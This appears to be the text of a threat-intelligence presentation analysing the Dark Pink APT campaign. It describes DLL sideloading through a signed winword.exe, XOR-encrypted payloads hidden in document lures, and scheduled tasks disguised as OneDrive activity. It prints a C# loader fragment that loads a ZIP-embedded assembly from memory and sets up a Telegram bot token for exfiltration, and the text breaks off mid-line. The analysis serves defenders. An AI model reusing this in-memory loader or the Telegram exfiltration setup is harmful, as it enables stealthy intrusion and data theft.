Unveiling Dark Pink: An In-Depth Analysis of APAC's Covert APT Threat

2025-05-10, 27 pages, 2033 KB, PDF
Abstract:

OUTLINE
  • Dark Pink's latest campaign
  • Telegram Exfiltration and C2 demo
  • TeleScout
  • Dark Pink's TTPs

I GOT AN EMAIL! (Group-IB, 2023)

ISO FILE
  • Signed winword.exe sideloads wwlib.dll
  • Malicious wwlib.dll sets up persistence
  • Extracts XOR encrypted payload from .doc lure
  • Displays .doc lure
  • Sets up scheduled task

SCHEDULED TASK
  • Microsoft Build Task saved in Temp folder
  • Name wct*.tmp relates to normal OneDrive activity

    public static void main()
    {
        string stealer_module = init_br();
        string Telegram_Chat_ID = Encoding.Default.GetString(chat_id_numbers);

        // The embedded payload is a ZIP archive held in a byte array.
        var inputStream = new MemoryStream(main_payload);
        ZipArchive archive = new ZipArchive(inputStream, ZipArchiveMode.Read);

        // Only the first archive entry is read.
        ZipArchiveEntry archEntry = archive.Entries[0];
        Stream entryStream = archEntry.Open();

        // The entry is copied into a memory buffer rather than a file.
        var tmpMem = new MemoryStream();
        entryStream.CopyTo(tmpMem);
        var xtmp = tmpMem.ToArray();

        // The buffer is loaded as a .NET assembly directly from memory.
        var memory_payload = Assembly.Load(xtmp);
        byte[] Telegram_BOT_API_token = Convert
